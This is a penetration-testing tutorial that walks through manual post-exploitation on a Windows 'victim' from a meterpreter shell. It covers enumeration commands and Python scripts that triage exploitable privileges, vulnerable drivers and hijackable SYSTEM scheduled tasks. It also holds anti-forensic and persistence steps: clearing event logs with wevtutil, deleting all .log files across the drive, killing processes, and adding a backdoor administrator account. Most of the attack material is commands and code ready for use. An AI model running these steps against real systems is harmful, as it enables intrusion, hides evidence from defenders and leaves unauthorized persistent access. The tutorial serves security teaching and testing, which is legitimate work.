
Manual Post Exploitation on Windows PC (System Command)

This article is about Post Exploitation on the Victim’s System using the Windows Command Line. When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the knowledge of the Windows Command Line.

Requirement

Attacker: Kali Linux

Target: Window PC

To execute this, we will first obtain a meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here; several of the commands below (clearing event logs, adding users, stopping services) fail without administrative rights.

Now, to access the Windows command line, type 'shell' in the meterpreter session. This spawns cmd.exe on the victim with the privileges of the process meterpreter is running in.

Let’s Start!!

Obtain User Details and its Privileges

After gaining the meterpreter shell or Windows command line, and before doing any other work, it is important to know the current user. This verifies that the account we were trying to obtain is the one we actually got, and it is done with the command whoami.

To increase our reach, we will add an option to the whoami command:

[/all]: To show all the details about the user.

whoami /all

As seen below, we have the username, SID and local group details.

We also obtain the privileges that are enabled or disabled for the user we are currently logged on as (this section alone is printed by whoami /priv). A privilege listed as Disabled is still assigned to the token and can be enabled by any process running under it, so entries such as SeImpersonatePrivilege or SeDebugPrivilege are interesting in either state.
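The triage a practitioner does on that privilege list can be automated when output is collected from many hosts. The following Python script is an added example, not code from the original article: it parses the PRIVILEGES INFORMATION section in the layout whoami /all prints it and reports which exploitable privileges the token holds, in either state. The sample output is constructed, and the high-value privilege table is the editor's triage list, not something the article defines.

```python
import re

# Constructed sample in the layout of the PRIVILEGES INFORMATION section that
# "whoami /all" (or "whoami /priv") prints; it is not output from the article.
SAMPLE_WHOAMI = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that are routinely turned into SYSTEM or arbitrary code execution.
# This is the editor's triage list (an assumption), not a list from the article.
HIGH_VALUE = {
    "SeImpersonatePrivilege": "token impersonation (potato family) to SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "create a process under another user's token",
    "SeDebugPrivilege": "open and inject into any process, e.g. lsass.exe",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then rewrite its ACL",
    "SeLoadDriverPrivilege": "load a kernel driver of the attacker's choosing",
}

# One table row: privilege name, free-text description, then Enabled/Disabled.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege name: 'Enabled' | 'Disabled'} from whoami output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_ROW.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(privs):
    """High-value privileges held by the token, with their current state.

    A Disabled privilege is still assigned: the process can enable it with
    AdjustTokenPrivileges, so both states are reported, sorted by name."""
    return sorted((name, state, HIGH_VALUE[name])
                  for name, state in privs.items() if name in HIGH_VALUE)


if __name__ == "__main__":
    for name, state, why in triage(parse_privileges(SAMPLE_WHOAMI)):
        print(f"{name:32} {state:9} {why}")
```

Paste the real whoami /all output in place of the constructed sample; the parser ignores the USER and GROUP sections because their rows do not match the privilege row pattern.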

Obtain the System Info

This command enumerates a lot of information about the system: hostname, domain, OS name, version and build, installed hotfixes, time zone and much more. The OS build and hotfix list are exactly what privilege-escalation suggester tools consume, so it is worth saving the full output.

systeminfo

We can filter the basic system details (Manufacturer, Model and Type) of the victim's system using findstr. Note that findstr is case-sensitive unless /i is given, so this matches the lines containing the capitalised word "System".

systeminfo | findstr System

As shown in the below screenshot, we have the Boot Time, Manufacturer, Model, Type, System Directory and System Locale of the victim's system.

We can estimate the location of the victim's system (roughly to the country) from the time zone reported by systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

systeminfo | findstr Time

As shown in the below screenshot, the Time Zone is UTC+05:30. That offset is used by India (and also Sri Lanka), and the zone name printed after the offset narrows it down further, so we can say the victim's system is almost certainly in India.

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can Obtain the basic memory details of the victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

systeminfo | findstr Memory

As shown in the below screenshot, the Total Physical Memory is 3.5 GB, of which 1.6 GB is available; the Virtual Memory details are listed as well.
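In practice the full systeminfo output is saved and parsed offline rather than grepped line by line on the victim; tools such as Windows Exploit Suggester take the saved file as input. The Python parser below is an added example, not part of the original article: it handles the label-padded format, including the multi-line Hotfix(s) and Network Card(s) entries and labels that themselves contain a colon, and pulls out the build number, hotfix list, UTC offset and memory figures discussed above. The sample output is constructed (the values are made up) and assumes the English locale, since the labels are localised.

```python
import re

# Constructed excerpt in the layout of English-locale "systeminfo" output.
# Labels are the real ones; every value is made up for this example.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DESKTOP-TEST
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19041 N/A Build 19041
OS Manufacturer:           Microsoft Corporation
System Boot Time:          1/5/2021, 9:12:44 AM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Total Physical Memory:     3,583 MB
Available Physical Memory: 1,640 MB
Virtual Memory: Max Size:  4,607 MB
Virtual Memory: Available: 2,215 MB
Domain:                    WORKGROUP
Time Zone:                 (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4562830
                           [02]: KB4570334
                           [03]: KB4577266
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
"""


def parse_systeminfo(text):
    """Return {label: [value lines]}.

    systeminfo pads every label so that all values start in the same column.
    That column is measured on the first line, which avoids guessing where a
    label with an embedded colon ("Virtual Memory: Max Size:") ends, and it
    works for any locale. Indented lines continue the previous label."""
    lines = [l for l in text.splitlines() if l.strip()]
    head = lines[0]
    col = len(head) - len(head.split(":", 1)[1].lstrip())
    info, current = {}, None
    for line in lines:
        label = line[:col].rstrip()
        if label.endswith(":"):
            current = label[:-1]
            info[current] = [line[col:].strip()]
        elif current and not label:          # continuation of a list entry
            info[current].append(line[col:].strip())
    return info


def build_number(info):
    m = re.search(r"Build (\d+)", info["OS Version"][0])
    return int(m.group(1)) if m else None


def hotfixes(info):
    """KB numbers of installed hotfixes, the input exploit suggesters want."""
    return re.findall(r"KB\d+", " ".join(info.get("Hotfix(s)", [])))


def utc_offset(info):
    """UTC offset from the Time Zone line, e.g. '+05:30'."""
    m = re.search(r"\(UTC([+-]\d{2}:\d{2})\)", info["Time Zone"][0])
    return m.group(1) if m else "+00:00"    # systeminfo prints plain "(UTC)" for zero


def memory_mb(info, label):
    """'3,583 MB' -> 3583 for any of the memory labels."""
    return int(info[label][0].split()[0].replace(",", ""))


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("build", build_number(info), "hotfixes", hotfixes(info))
    print("tz", utc_offset(info), "free/total MB",
          memory_mb(info, "Available Physical Memory"), "/",
          memory_mb(info, "Total Physical Memory"))
```

Save the victim's output with systeminfo > sysinfo.txt, pull the file back through the meterpreter download command, and feed its contents to parse_systeminfo; on a non-English system the labels passed to memory_mb and friends are the only things that need changing.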

Obtain the List of System Drivers

We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.

driverquery

Obtain the List of Kernel Drivers

We can obtain the list of kernel drivers on the victim's system using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

driverquery | findstr Kernel

As seen below, we have obtained a list of kernel drivers. This list is worth keeping: a third-party driver with a known vulnerability gives direct kernel-level code execution on the victim, so the driver names (driverquery /v adds the image path and link date) can be checked against public lists of exploitable drivers.

Obtain the List of File System Drivers

We can obtain the list of file system drivers on the victim's system using driverquery.

Here we are using findstr with driverquery to filter the driverquery results. The search string contains a space, so it must be passed with /C:; without it, findstr treats "File System" as two separate patterns and matches every line containing either "File" or "System", which includes most of the kernel drivers.

driverquery | findstr /C:"File System"
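driverquery /fo csv (with /v for the image paths) gives the same data in a form that is easier to work with than findstr filters. The Python script below is an added example, not from the original article: it groups drivers by type, which is what the findstr Kernel and findstr /C:"File System" filters approximate, and shortlists running drivers whose image lives outside the Windows drivers directory, the usual sign of a third-party driver worth checking for known vulnerabilities. The CSV rows are constructed: the column names are those of driverquery /v /fo csv, while the drivers acmedrv and oldtool and their paths are made up.

```python
import csv
import io

# Constructed rows in the column layout of "driverquery /v /fo csv".
# acmedrv and oldtool are invented for the example; only the columns used
# below matter, the rest are present so real output parses the same way.
SAMPLE_DRIVERQUERY_CSV = '''\
"Module Name","Display Name","Description","Driver Type","Start Mode","State","Status","Accept Stop","Accept Pause","Paged Pool(bytes)","Code(bytes)","BSS(bytes)","Link Date","Path","Init(bytes)"
"ACPI","Microsoft ACPI Driver","Microsoft ACPI Driver","Kernel","Boot","Running","OK","TRUE","FALSE","143,360","471,040","0","","C:\\Windows\\system32\\drivers\\ACPI.sys","8,192"
"Ntfs","NTFS","NTFS","File System","Manual","Running","OK","TRUE","FALSE","","","","","C:\\Windows\\system32\\drivers\\Ntfs.sys",""
"VBoxGuest","VirtualBox Guest Driver","VirtualBox Guest Driver","Kernel","Boot","Running","OK","TRUE","FALSE","4,096","90,112","0","","C:\\Windows\\system32\\drivers\\VBoxGuest.sys","4,096"
"acmedrv","Acme Hardware Monitor","Acme Hardware Monitor","Kernel","Auto","Running","OK","TRUE","FALSE","4,096","12,288","0","","C:\\Program Files\\Acme\\acmedrv.sys","4,096"
"mrxsmb","SMB MiniRedirector Wrapper and Engine","SMB MiniRedirector Wrapper and Engine","File System","Manual","Running","OK","TRUE","FALSE","","","","","C:\\Windows\\system32\\DRIVERS\\mrxsmb.sys",""
"oldtool","Old Vendor Tool","Old Vendor Tool","Kernel","Manual","Stopped","OK","FALSE","FALSE","","","","","C:\\Tools\\oldtool.sys",""
'''

SYSTEM_DRIVER_DIR = "\\windows\\system32\\drivers\\"


def parse_driverquery(csv_text):
    """Rows of driverquery /fo csv as dicts keyed by the header names."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def by_type(drivers):
    """{'Kernel': [module names], 'File System': [module names]}: the split the
    findstr Kernel and findstr /C:"File System" pipelines approximate."""
    groups = {}
    for d in drivers:
        groups.setdefault(d["Driver Type"], []).append(d["Module Name"])
    return groups


def third_party(drivers):
    """Running drivers loaded from outside %SystemRoot%\\System32\\drivers.

    These are usually vendor drivers and the first ones to check against
    known-vulnerable-driver lists. It is a first cut only: vendor drivers
    installed into the system directory (VBoxGuest above) slip past it, so
    the full Kernel group still deserves a look."""
    found = []
    for d in drivers:
        path = d["Path"].lower().replace("/", "\\")
        if d["State"] == "Running" and SYSTEM_DRIVER_DIR not in path:
            found.append((d["Module Name"], d["Path"]))
    return found


if __name__ == "__main__":
    drivers = parse_driverquery(SAMPLE_DRIVERQUERY_CSV)
    for kind, names in by_type(drivers).items():
        print(kind, names)
    print("outside the drivers directory:", third_party(drivers))
```

Collect the real data with driverquery /v /fo csv > drivers.csv on the victim and pass the file contents to parse_driverquery; the Stopped driver in the sample shows why State is checked, since a driver that is installed but not loaded is not a kernel foothold until it is started.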

Display Info about a Particular Service

We can obtain information about a particular service using the sc command (sc query with no name lists every active service, and sc qc [service name] shows its configuration: binary path, start type and the account it runs as). Here we are using the following option with the sc command:

[query] to obtain the current state of a service.

Syntax: sc query [service name]

sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running processes using the tasklist command.

This command shows the image name of each running process along with its Process ID (PID), Session Name, Session Number and Memory Usage.

tasklist

We can filter the output of tasklist down to the processes that have loaded a particular module (DLL) using the following option of the tasklist command:

[/m]: To list the modules loaded by each process.

The name of the module we are interested in has to be supplied, otherwise every module of every process is listed.

Syntax: tasklist /m [Module Name]

tasklist /m ntdll.dll

Here we can see all the processes that have ntdll.dll loaded, which is every user-mode process; a DLL specific to the software being hunted (an EDR agent, a VPN client) makes a much more selective filter.

Killing Tasks

We can kill tasks on the Victim’s System using a command called taskkill.

Taskkill requires either one of two things:

  1. Process Id
  2. Task Name

Here we are going to use the [/f] option of taskkill, which forcefully terminates the process instead of asking it to exit.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

taskkill /f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im "[Task Name]"

taskkill /f /im "Taskmgr.exe"

Start or Stopping Services

We can start a service, including a backdoor we have installed as one, without the knowledge of the victim using the sc command.

Here we are using the following option with the sc command:

[start] to start a service.

Syntax: sc start [Service Name]

sc start TeamViewer

As you can see in the below image, the service has started.

We can also stop a service using the sc command. Here we are using the following option with the sc command:

[stop] to stop a service.

Syntax: sc stop [Service Name]

sc stop TeamViewer

As you can see in the below image, the service has stopped. Note that sc takes the service name as shown by sc query, not the display name, and that every start and stop is recorded by the Service Control Manager in the System event log (event ID 7036).

List all the logs on the System

We can obtain a list of all the logs on a system using the wevtutil command. Here we are using the following options with the wevtutil command:

[el] to List log names.

wevtutil el

Clear a specific log on the System

We can clear a specific log on a system using the wevtutil command. Here we are using the following option with the wevtutil command:

[cl] to clear the named log.

Syntax: wevtutil cl [log name]

wevtutil cl System

This needs administrative rights, and clearing a log is itself recorded: clearing the Security log writes event ID 1102 ("The audit log was cleared") into it, and clearing any other log writes event ID 104 into the System log, so a defender reviewing the logs, or receiving them through log forwarding, will see that it happened.

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a remote PC, knowledge of all the hard disks, storage devices and partitions is essential so that we can sweep every partition and storage device in the hope of finding data of particular importance.

This can be done using the fsutil command. Here we are using the following options with the fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

fsutil fsinfo drives

As you can see below, the victim's system has four drive letters: C, D, E and F. fsutil does not say whether a letter is a fixed disk partition, a removable drive or a mapped network share, so each one should be checked (for example with wmic logicaldisk get caption,drivetype,volumename).

Delete all logs on a System

While penetration testing a remote PC, it is often necessary to remove the traces of our activity, and the evidence of our presence is mostly found in log files.

Many application, installer and service logs are plain-text files with a .log extension, so we sweep the drive for files with that extension and delete them with the del command. The Windows event logs are not among them: they are .evtx files under C:\Windows\System32\winevt\Logs, held open by the Event Log service, so del cannot remove them and they have to be cleared with wevtutil cl as shown earlier.

Note: Run this command from the root of the system drive (in my case C:\); the path \*.log is relative to the root of the current drive, and /s makes del walk every subdirectory beneath it.

Here we are using the following options with the del command:

[/a] to select files regardless of their attributes, so hidden and system files are included too (/a:s would restrict the selection to files carrying the system attribute)

[/s] to delete the matching files from all subdirectories as well

[/q] to use Quiet Mode (it doesn't ask if OK to delete on global wildcards)

[/f] to force deletion of read-only files

Syntax: del [Directory]\*.log /a /s /q /f

del \*.log /a /s /q /f

As you can see in the below screenshot, the process of locating and deleting the files with the .log extension has started. A log file that is currently open by a running process is skipped with an access error and can only be removed after that process is stopped.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of local users so that the attacker knows which accounts exist on that particular system.

This can be done using the net command. Here we are using the following option with the net command:

[user] to display the list of local users

net user

It is often advantageous to add a local user so that the attacker has a way back into the system.

This can be done using the net command. Here we are using the following options with the net command:

Syntax: net user [logon_name] [password] /add

net user hacker pass123 /add

The password has to satisfy the local password policy (minimum length and complexity), otherwise the command fails with a policy error. Account creation is also logged in the Security log as event ID 4720.

Many times we come across a situation where we have to perform certain administrative tasks, so we will add the user we created to the local Administrators group.

Here we are using the following option with the net command:

[localgroup] to manage the local groups and their members

Syntax: net localgroup administrators [logon_name] /add

net localgroup administrators hacker /add

In the above example, I have added the user named hacker to the local Administrators group (logged in the Security log as event ID 4732). We can verify it with net user hacker, which lists the account's local group memberships, or with net localgroup administrators.

Now, during the clean-up process, it is important to delete the local user-created.

This can be done using net command. Here we are using the following options with the net command:

Syntax: net user [logon_name] /del

net user hacker /del

Here you can see that I have used the net command to add a user, make it a member of the local Administrators group and then delete that user.

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.

We can format the schtasks output as a list, which is far more readable than the default table once the verbose columns are included.

Here we are using the following options with the schtasks command:

[/query] to display all scheduled tasks

[/fo] to specify the format of the Output (In this case we use List)

[/v] to use verbose mode

schtasks /query /fo LIST /v
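The verbose list output lends itself to parsing. The Python script below is an added example, not code from the original article: it splits schtasks /query /fo LIST /v output into one record per task and shortlists enabled tasks that run as SYSTEM from an executable outside the Windows directory. If that executable or its directory is writable by the current user, the task will run attacker code as SYSTEM at its next trigger; checking the ACL (icacls on the victim) is the follow-up step the script does not do. The sample output is constructed, and the task names and paths are made up.

```python
import re

# Constructed output in the layout of "schtasks /query /fo LIST /v" on an
# English-locale system. BackupAgent, its path and all dates are invented.
SAMPLE_SCHTASKS = """\
Folder: \\
HostName:                             DESKTOP-TEST
TaskName:                             \\BackupAgent
Next Run Time:                        1/6/2021 2:00:00 AM
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        1/5/2021 2:00:00 AM
Last Result:                          0
Author:                               DESKTOP-TEST\\admin
Task To Run:                          C:\\Tools\\backup\\agent.exe --nightly
Start In:                             C:\\Tools\\backup
Comment:                              N/A
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Daily

Folder: \\Microsoft\\Windows\\Defrag
HostName:                             DESKTOP-TEST
TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        11/30/1999 12:00:00 AM
Last Result:                          267011
Author:                               Microsoft Corporation
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -k -g -$
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

# "Key:   value": the key ends at the first colon that is followed by spaces.
KV = re.compile(r"^(.+?):\s+(.*)$")

# Accounts whose tasks give SYSTEM-level execution if their binary is hijacked.
PRIVILEGED = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}


def parse_schtasks_list(text):
    """One dict per task; records are separated by blank lines, and blocks
    without a TaskName (folder-only or INFO lines) are dropped."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if "TaskName" in current:
                tasks.append(current)
            current = {}
            continue
        m = KV.match(line)
        if m:
            current[m.group(1).strip()] = m.group(2).strip()
    if "TaskName" in current:
        tasks.append(current)
    return tasks


def executable(task):
    """Image path from 'Task To Run': the first token, honouring a quoted path."""
    cmd = task.get("Task To Run", "")
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    return cmd.split(" ")[0]


def candidates(tasks):
    """Enabled SYSTEM tasks whose image lives outside the Windows directory.
    Each is (task name, executable, next run time); writability of the
    executable still has to be confirmed on the victim."""
    found = []
    for t in tasks:
        exe = executable(t).lower()
        in_windows = exe.startswith(("%windir%", "%systemroot%", "c:\\windows\\"))
        if (t.get("Scheduled Task State") == "Enabled"
                and t.get("Run As User", "").upper() in PRIVILEGED
                and not in_windows):
            found.append((t["TaskName"], executable(t), t.get("Next Run Time")))
    return found


if __name__ == "__main__":
    for name, exe, when in candidates(parse_schtasks_list(SAMPLE_SCHTASKS)):
        print(f"{name}: {exe} (next run {when})")
```

Redirect the real output with schtasks /query /fo LIST /v > tasks.txt on the victim and pass the file contents to parse_schtasks_list; tasks that run as a named administrator rather than SYSTEM are also worth a look and can be added to PRIVILEGED once net localgroup administrators has shown who those are.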

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here